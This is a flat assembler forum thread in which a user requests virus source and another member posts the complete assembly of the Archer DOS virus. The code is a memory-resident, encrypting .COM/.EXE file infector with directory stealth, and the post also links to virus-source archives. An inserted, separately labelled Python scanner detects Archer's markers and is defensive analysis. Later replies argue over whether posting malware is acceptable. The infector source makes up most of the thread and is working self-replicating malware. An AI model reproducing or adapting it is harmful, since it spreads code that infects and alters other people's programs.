flat assembler
Message board for the users of flat assembler.

Thread (DOS section): Executable Virus, INTRUDER
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 17 Jul 2014, 17:32
I need the INTRUDER virus code. Those who know it, please give it to me. Thank you very much.

_________________
NgocIT
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 17 Jul 2014, 18:14

_________________
smaller is better


Last edited by CandyMan on 22 Jul 2014, 20:33; edited 1 time in total
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 01:25
I want its code. I can't find from your links. Can you give me the code?
iz56



Joined: 17 Jun 2011
Posts: 7
Location: rus
iz56 18 Jul 2014, 03:46
Disassembler?
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 04:43
Oh, but that takes a very long time and is not very exact. I need the .ASM file; it is my exercise. I have to read and understand it.
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 18 Jul 2014, 04:55
Virus source codes are not the easiest of things to find. Perhaps you can contact the author and pay him/her to send you the files. If not, then ... disassembler.
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 18 Jul 2014, 05:04
Thanks all.
CandyMan, can you send me the file?
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 18 Jul 2014, 13:27
I recommend a disassembler of my own authorship: http://board.flatassembler.net/topic.php?p=109397#109397

_________________
smaller is better
cognnav



Joined: 17 Jul 2014
Posts: 8
cognnav 19 Jul 2014, 04:36
OK, thanks.
CandyMan



Joined: 04 Sep 2009
Posts: 413
Location: film "CandyMan" directed through Bernard Rose OR Candy Shop
CandyMan 21 Jul 2014, 17:58
you can find source codes of viruses here http://vxheavens.com/src.php or here http://en.pudn.com/sourcecode/kill-virus/download27.html
see also code:
Code:
; archer.asm : [Archer] MnemoniX `94
; Created with Biological Warfare - Version 0.90ß by MnemoniX

PING            equ     0AE3Bh
PONG            equ     0CD28h
STAMP           equ     30
MARKER          equ     04D4Dh

code            segment
                org     0
                assume  cs:code,ds:code

start:
                db      0E9h,3,0          ; to virus
host:
                db      0CDh,20h,0        ; host program
virus_begin:

                db      0BBh                    ; decryption module
code_offset     dw      offset virus_code
                mov     dx,VIRUS_SIZE / 2 + 1

decrypt:
                db      02Eh,081h,07h           ; ADD CS:[BX]
cipher          dw      0
                inc     bx
                inc     bx
                dec     dx
                jnz     decrypt


virus_code:
                call    $ + 3             ; BP is instruction ptr.
                pop     bp
                sub     bp,offset $ - 1

                push    ds es

                mov     ax,PING           ; test for residency
                int     21h
                cmp     bx,PONG
                je      installed

                mov     ax,es                   ; Get PSP
                dec     ax
                mov     ds,ax                   ; Get MCB

                sub     word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
                sub     word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
                mov     es,word ptr ds:[12h]

                push    cs                      ; copy virus into memory
                pop     ds
                xor     di,di
                mov     si,bp
                mov     cx,(virus_end - start) / 2 + 1
                rep     movsw

                xor     ax,ax                   ; capture interrupts
                mov     ds,ax

                sub     word ptr ds:[413h],(MEM_SIZE+1023) / 1024

                mov     si,21h * 4              ; get original int 21
                mov     di,offset old_int_21
                movsw
                movsw

                mov     word ptr ds:[si - 4],offset new_int_21
                mov     ds:[si - 2],es          ; and set new int 21

installed:
                call    activate                ; activation routine

                pop     es ds                   ; restore segregs
                cmp     sp,MARKER               ; check for .EXE
                je      exe_exit

com_exit:
                lea     si,[bp + host]          ; restore host program
                mov     di,100h
                push    di
                movsw
                movsb

                call    fix_regs                ; fix up registers
                ret                             ; and leave
exe_exit:
                mov     ax,ds                   ; fix up return address
                add     ax,10h
                add     ax,cs:[bp + exe_cs]
                mov     cs:[bp + return_cs],ax

                mov     ax,cs:[bp + exe_ip]
                mov     cs:[bp + return_ip],ax
                mov     sp,[bp + exe_sp]        ; restore SP

                call    fix_regs                ; fix up registers
                db      0EAh                    ; back to host program
return_ip       dw      0
return_cs       dw      0

exe_cs          dw      -16                     ; orig CS:IP
exe_ip          dw      103h
exe_sp          dw      -2                      ; orig SP

fix_regs:
                xor     ax,ax
                cwd
                xor     bx,bx
                mov     si,100h
                xor     di,di
                ret

; interrupt 21 handler
int_21:
                pushf
                call    dword ptr cs:[old_int_21]
                ret

new_int_21:
                cmp     ax,PING                 ; residency test
                je      ping_pong
                cmp     ax,4B00h                ; execute program
                je      execute
                cmp     ah,3Dh                  ; file open
                je      file_open
                cmp     ah,11h                  ; directory stealth
                je      dir_stealth
                cmp     ah,12h
                je      dir_stealth
int_21_exit:
                db      0EAh                    ; never mind ...
old_int_21      dd      0

ping_pong:
                mov     bx,PONG
                iret

dir_stealth:
                call    int_21                  ; get dir entry
                test    al,al
                js      dir_stealth_done

                push    ax bx es
                mov     ah,2Fh
                int     21h

                cmp     byte ptr es:[bx],-1     ; check for extended FCB
                jne     no_ext_FCB
                add     bx,7
no_ext_FCB:
                mov     ax,es:[bx + 17h]        ; check for infection marker
                and     al,31
                cmp     al,STAMP
                jne     dir_fixed

                sub     word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
                sbb     word ptr es:[bx + 1Fh],0
dir_fixed:
                pop     es bx ax
dir_stealth_done:
                iret

file_open:
                push    ax cx di es
                call    get_extension
                cmp     [di],'OC'               ; .COM file?
                jne     perhaps_exe             ; perhaps .EXE then
                cmp     byte ptr [di + 2],'M'
                jne     not_prog
                jmp     a_program
perhaps_exe:
                cmp     [di],'XE'               ; .EXE file?
                jne     not_prog
                cmp     byte ptr [di + 2],'E'
                jne     not_prog
a_program:
                pop     es di cx ax
                jmp     execute                 ; infect file
not_prog:
                pop     es di cx ax
                jmp     int_21_exit

execute:
                push    ax bx cx dx si di ds es

                xor     ax,ax                   ; critical error handler
                mov     es,ax                   ; routine - catch int 24
                mov     es:[24h * 4],offset int_24
                mov     es:[24h * 4 + 2],cs

                mov     ax,4300h                ; change attributes
                int     21h

                push    cx dx ds
                xor     cx,cx
                call    set_attributes

                mov     ax,3D02h                ; open file
                call    int_21
                jc      cant_open
                xchg    bx,ax
                push    cs                      ; CS = DS
                pop     ds

                mov     ax,5700h                ; save file date/time
                int     21h
                push    cx dx
                mov     ah,3Fh
                mov     cx,28
                mov     dx,offset read_buffer
                int     21h

                cmp     word ptr read_buffer,'ZM' ; .EXE?
                je      infect_exe              ; yes, infect as .EXE

                mov     al,2                    ; move to end of file
                call    move_file_ptr

                cmp     dx,65279 - (VIRUS_SIZE + 3)
                ja      dont_infect             ; too big, don't infect

                sub     dx,VIRUS_SIZE + 3       ; check for previous infection
                cmp     dx,word ptr read_buffer + 1
                je      dont_infect

                add     dx,VIRUS_SIZE + 3
                mov     word ptr new_jump + 1,dx

                add     dx,103h
                call    encrypt_code            ; encrypt virus

                mov     dx,offset read_buffer   ; save original program head
                int     21h
                mov     ah,40h                  ; write virus to file
                mov     cx,VIRUS_SIZE
                mov     dx,offset encrypt_buffer
                int     21h

                xor     al,al                   ; back to beginning of file
                call    move_file_ptr

                mov     dx,offset new_jump      ; and write new jump
                int     21h

fix_date_time:
                pop     dx cx
                and     cl,-32                  ; add time stamp
                or      cl,STAMP                ; for directory stealth
                mov     ax,5701h                ; restore file date/time
                int     21h

close:
                pop     ds dx cx                ; restore attributes
                call    set_attributes

                mov     ah,3Eh                  ; close file
                int     21h

cant_open:
                pop     es ds di si dx cx bx ax
                jmp     int_21_exit             ; leave


set_attributes:
                mov     ax,4301h
                int     21h
                ret

dont_infect:
                pop     cx dx                   ; can't infect, skip
                jmp     close

move_file_ptr:
                mov     ah,42h                  ; move file pointer
                cwd
                xor     cx,cx
                int     21h

                mov     dx,ax                   ; set up registers
                mov     ah,40h
                mov     cx,3
                ret
infect_exe:
                cmp     word ptr read_buffer[26],0
                jne     dont_infect             ; overlay, don't infect

                cmp     word ptr read_buffer[16],MARKER
                je      dont_infect             ; infected already

                les     ax,dword ptr read_buffer[20]
                mov     exe_cs,es               ; CS
                mov     exe_ip,ax               ; IP

                mov     ax,word ptr read_buffer[16]
                mov     exe_sp,ax               ; SP
                mov     word ptr read_buffer[16],MARKER
                mov     ax,4202h                ; to end of file
                cwd
                xor     cx,cx
                int     21h

                push    ax dx                   ; save file size

                push    bx
                mov     cl,12                   ; calculate offsets for CS
                shl     dx,cl                   ; and IP
                mov     bx,ax
                mov     cl,4
                shr     bx,cl
                add     dx,bx
                and     ax,15
                pop     bx

                sub     dx,word ptr read_buffer[8]
                mov     word ptr read_buffer[22],dx
                mov     word ptr read_buffer[20],ax

                pop     dx ax                   ; calculate prog size

                add     ax,VIRUS_SIZE + 3
                adc     dx,0
                mov     cx,512                  ; in pages
                div     cx                      ; then save results
                inc     ax
                mov     word ptr read_buffer[2],dx
                mov     word ptr read_buffer[4],ax
                mov     dx,word ptr read_buffer[20]
                call    encrypt_code            ; encrypt virus


                mov     ah,40h
                mov     cx,VIRUS_SIZE + 3
                mov     dx,offset encrypt_buffer
                int     21h


                mov     ax,4200h                ; back to beginning
                cwd
                xor     cx,cx
                int     21h

                mov     ah,40h                  ; and fix up header
                mov     cx,28
                mov     dx,offset read_buffer
                int     21h
                jmp     fix_date_time           ; done

courtesy_of     db      '[BW]',0
signature       db      '[Archer] MnemoniX `94',0

activate:
                xor     ah,ah                   ; get system time
                int     1Ah
                cmp     dl,0F1h
                jb      no_activate

                mov     ah,0Fh                  ; get display page
                int     10h

                mov     al,dl                   ; random number, 0-15
                and     al,15

                mov     ah,3                    ; activating - get cursor
                int     10h                     ; position and save
                push    dx

                mov     dh,al                   ; set cursor at random
                xor     dl,dl                   ; row, column 1
                mov     ah,2
                int     10h

                mov     di,79
                mov     cx,1

arrow:
                mov     ax,91Ah                 ; print arrow and erase
                mov     bl,10                   ; 79 times
                int     10h

                push    cx                      ; time delay
                mov     cx,-200
                rep     lodsb
                pop     cx

                mov     ah,2
                mov     dl,' '
                int     21h

                dec     di
                jnz     arrow

                pop     dx                      ; reset cursor
                mov     ah,2
                int     10h                     ; and we're done

no_activate:
                ret

get_extension:
                push    ds                      ; find extension
                pop     es
                mov     di,dx
                mov     cx,64
                mov     al,'.'
                repnz   scasb
                ret

encrypt_code:
                push    ax cx

                push    dx
                xor     ah,ah                   ; get time for random number
                int     1Ah

                mov     cipher,dx               ; save encryption key
                pop     cx
                add     cx,virus_code - virus_begin
                mov     code_offset,cx          ; save code offset

                push    cs                      ; ES = CS
                pop     es

                mov     si,offset virus_begin   ; move decryption module
                mov     di,offset encrypt_buffer
                mov     cx,virus_code - virus_begin
                rep     movsb

                mov     cx,VIRUS_SIZE / 2 + 1
encrypt:
                lodsw                           ; encrypt virus code
                sub     ax,dx
                stosw
                loop    encrypt

                pop     cx ax
                ret

int_24:
                mov     al,3                    ; int 24 handler
                iret
new_jump        db      0E9h,0,0

virus_end:
VIRUS_SIZE      equ     virus_end - virus_begin
read_buffer     db      28 dup (?)              ; read buffer
encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer

end_heap:

MEM_SIZE        equ     end_heap - start

code            ends
                end     start
    

_________________
smaller is better
Post 21 Jul 2014, 17:58
View user's profile Send private message Reply with quote
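Added example, not part of this thread and not MnemoniX's or the BW generator's code: a static scanner in Python for the infection markers that the Archer source above leaves in plain sight. The 16-byte decryptor (mov bx,imm / mov dx,imm / add cs:[bx],imm / inc bx / inc bx / dec dx / jnz) is never encrypted, so it can be matched byte-for-byte; its `mov dx,VIRUS_SIZE/2+1` operand gives back VIRUS_SIZE (up to the integer-division bit), its `add cs:[bx],cipher` operand gives back the key, and adding that key to each word of the body undoes the per-word `sub ax,dx` of encrypt_code, which exposes the `[Archer] MnemoniX `94` string. The .EXE header flag (initial SP == MARKER), the .COM entry jump relation (`rel == size - VIRUS_SIZE - 3`) and the seconds-field STAMP are checked from the same constants. The stub layout, field names and `build_sample()` are my own; `build_sample()` produces constructed test images laid out as the infector would write them, with a filler body that carries only the signature string and nothing executable.

```python
"""Static checks for the Archer infection markers visible in the posted source.
The stub layout and all function names are this example's own assumptions;
build_sample() makes constructed test images (filler body + signature only)."""
import struct

# Values taken from the posted source.
MARKER = 0x4D4D            # written into the .EXE header's initial SP (offset 16)
STAMP = 30                 # low 5 bits of the FAT time word (seconds/2) -> "60 s"
STUB_LEN = 16              # virus_code - virus_begin: bytes of plaintext decryptor
SIGNATURE = b"[Archer] MnemoniX `94"

# Decryptor stub, little-endian fields:
#   BB imm16        mov bx,code_offset      BA imm16   mov dx,VIRUS_SIZE/2+1
#   2E 81 07 imm16  add cs:[bx],cipher      43 43 4A   inc bx / inc bx / dec dx
#   75 F6           jnz decrypt (rel8 = -10)
_STUB = struct.Struct("<BHBHBBBHBBBBb")
assert _STUB.size == STUB_LEN
_FIXED = {0: 0xBB, 2: 0xBA, 4: 0x2E, 5: 0x81, 6: 0x07,
          8: 0x43, 9: 0x43, 10: 0x4A, 11: 0x75, 12: -10}


def parse_stub(buf, off):
    """Return (code_offset, word_count, key) if the decryptor sits at buf[off:]."""
    if off < 0 or len(buf) < off + STUB_LEN:
        return None
    f = _STUB.unpack_from(buf, off)
    if any(f[i] != v for i, v in _FIXED.items()):
        return None
    return f[1], f[3], f[7]


def decrypt_body(buf, off, word_count, key):
    """ADD the key back to each word, as the stub does at load time (the
    infector's loop runs a word or two past the bytes it actually wrote)."""
    start = off + STUB_LEN
    n = min(word_count, (len(buf) - start) // 2)
    words = struct.unpack_from("<%dH" % n, buf, start)
    return struct.pack("<%dH" % n, *((w + key) & 0xFFFF for w in words))


def stamp_set(dos_time):
    """True when a FAT time word carries the 'seconds = 60' stealth stamp."""
    return (dos_time & 31) == STAMP


def entry_offset(buf):
    """File offset of the first code executed: .COM (E9 jump) or .EXE (CS:IP)."""
    if buf[:2] == b"MZ" and len(buf) >= 28:
        hdr_paras = struct.unpack_from("<H", buf, 8)[0]
        ip, cs = struct.unpack_from("<HH", buf, 20)
        return "exe", ((hdr_paras + cs) & 0xFFFF) * 16 + ip
    if buf[:1] == b"\xE9" and len(buf) >= 3:
        rel = struct.unpack_from("<H", buf, 1)[0]
        return "com", 3 + rel         # target 100h+3+rel, minus the 100h load base
    return None, None


def scan(buf):
    """Report which Archer markers a .COM/.EXE image carries."""
    kind, entry = entry_offset(buf)
    report = {"kind": kind, "entry": entry, "header_flag": False,
              "stub": False, "size_match": False, "signature": False}
    if kind is None:
        return report
    if kind == "exe":
        report["header_flag"] = struct.unpack_from("<H", buf, 16)[0] == MARKER
    stub = parse_stub(buf, entry)
    if stub is None:
        return report
    code_offset, count, key = stub
    report.update(stub=True, key=key, code_offset=code_offset)
    sizes = {2 * (count - 1), 2 * (count - 1) + 1}      # VIRUS_SIZE/2+1 == count
    appended = len(buf) - entry - (3 if kind == "exe" else 0)  # .EXE writes VIRUS_SIZE+3
    report["size_match"] = appended in sizes
    report["signature"] = SIGNATURE in decrypt_body(buf, entry, count, key)
    return report


def _encrypt(plain, key):
    words = struct.unpack("<%dH" % (len(plain) // 2), plain)
    return struct.pack("<%dH" % len(words), *((w - key) & 0xFFFF for w in words))


def build_sample(kind, key=0x1234):
    """Constructed image in the infector's layout; the 'virus' is filler + signature."""
    body = b"\x90" * 16 + SIGNATURE + b"\x00" * 11     # 48 bytes, even length
    virus_size = STUB_LEN + len(body)
    count = virus_size // 2 + 1
    host = b"\xB4\x4C\xCD\x21"                         # mov ah,4Ch / int 21h
    if kind == "com":
        entry = 3 + len(host)
        stub = _STUB.pack(0xBB, 0x100 + entry + STUB_LEN, 0xBA, count,
                          0x2E, 0x81, 0x07, key, 0x43, 0x43, 0x4A, 0x75, -10)
        # JMP over host, host's untouched tail, saved 3-byte head, stub, body
        return (b"\xE9" + struct.pack("<H", len(host)) + host[3:] + host[:3]
                + stub + _encrypt(body, key))
    hdr_paras = 2
    orig_len = hdr_paras * 16 + len(host)
    cs, ip = (orig_len >> 4) - hdr_paras, orig_len & 15
    stub = _STUB.pack(0xBB, ip + STUB_LEN, 0xBA, count,
                      0x2E, 0x81, 0x07, key, 0x43, 0x43, 0x4A, 0x75, -10)
    total = orig_len + virus_size + 3
    header = struct.pack("<2sHHHHHHHHHHHHH", b"MZ", total % 512, total // 512 + 1,
                         0, hdr_paras, 0, 0xFFFF, 0, MARKER, 0, ip, cs, 0x1C, 0)
    return (header.ljust(hdr_paras * 16, b"\x00") + host + stub
            + _encrypt(body, key) + b"\x00" * 3)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan(fh.read()))
```

The stub match is the reliable part: the key changes on every infection, so the encrypted body has no stable bytes, but the decryptor and the header flag do. `stamp_set()` needs the raw FAT time word (from a directory entry or a DOS 5700h call); `os.stat` on a mounted image will not show 60-second times.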
KevinN



Joined: 09 Oct 2012
Posts: 160
KevinN 21 Jul 2014, 22:07
I thought that the RULE was not to exchange viruses, malware etc. on this website? Have the rules changed or have I deceived myself somehow?

I guess there is a benevolent purpose in security analysis in order to prevent people from suffering due to these exploits. I hope the ones here are not directing their wills to intentionally harm, frustrate, exploit, steal, endanger and so on.
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 21 Jul 2014, 22:12
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.
KevinN



Joined: 09 Oct 2012
Posts: 160
KevinN 22 Jul 2014, 02:20
revolution wrote:
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.


Good point. Just hope this isn't making way to turn this place into a school for extremely cruel deeds.
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 22 Jul 2014, 22:57
revolution wrote:
I think that for DOS it doesn't matter so much. The entire OS is not protected and very few people use it. The impact will likely be minimal.
That's fine, but the point is there are links to dozens of potentially harmful virii for Windows, Linux and other OS's in the URL's given above. So maybe reconsider...

_________________
FAMOS - the first memory operating system
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 22 Jul 2014, 23:11
Links are easily findable with any search engine. I doubt anyone is coming here specifically to find malware.
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 23 Jul 2014, 10:17
revolution wrote:
Links are easily findable with any search engine. I doubt anyone is coming here specifically to find malware.
That's fine too, for now, but it also misses the point.

OK folks, you CAN post your malware here after all, and if you're not into the FUN world of malware yet, but maybe just curious, check out the links above... Study the source code, learn how to exploit the many vulnerabilities of your favourite operating system to unleash on the millions of DUMB gullible users out there who deserve to have their systems trashed, discover the huge variety of techniques to make self-replicating code do especially harmful and destructive things, and (if you are "clever" enough) devise some new ones of your very own. And come back later because there'll be even more malware here for you...

_________________
FAMOS - the first memory operating system
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 23 Jul 2014, 11:00
Well then I guess it's troublesome to be a DOS user.
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 23 Jul 2014, 11:10
revolution wrote:
Well then I guess it's troublesome to be a DOS user. Wink
or any other OS user!

_________________
FAMOS - the first memory operating system
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 20299
Location: In your JS exploiting you and your system
revolution 23 Jul 2014, 11:13
This section is for DOS. DOS is not a protected OS. So users of DOS can't expect any protection from their OS. DOS malware won't magically affect other protected OSes.
neville



Joined: 13 Jul 2008
Posts: 507
Location: New Zealand
neville 24 Jul 2014, 09:41
revolution wrote:
This section is for DOS.
DOS is not a protected OS.
So users of DOS can't expect any protection from their OS.
DOS malware won't magically affect other protected OSes.
So your first three statements are just stating the obvious.

Your last statement is definitely contentious, but of course the degree of contention depends on your definition of a "protected" OS. So if you want to continue to argue that one, we will need to agree on that definition. But as I'm sure you know, a technically-satisfactory, comprehensive (and mutually-acceptable) definition could be a VERY hard ask.

But folks, irrespective of all that, it seems we are now collectively authorised to post any malware at all, here in the DOS section. If your malware is intended to affect any other OS, protected or otherwise, it will be magically ignored because it will be assumed to be for DOS, since you have posted it in the DOS section! Enjoy!

_________________
FAMOS - the first memory operating system

Copyright © 1999-2024, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.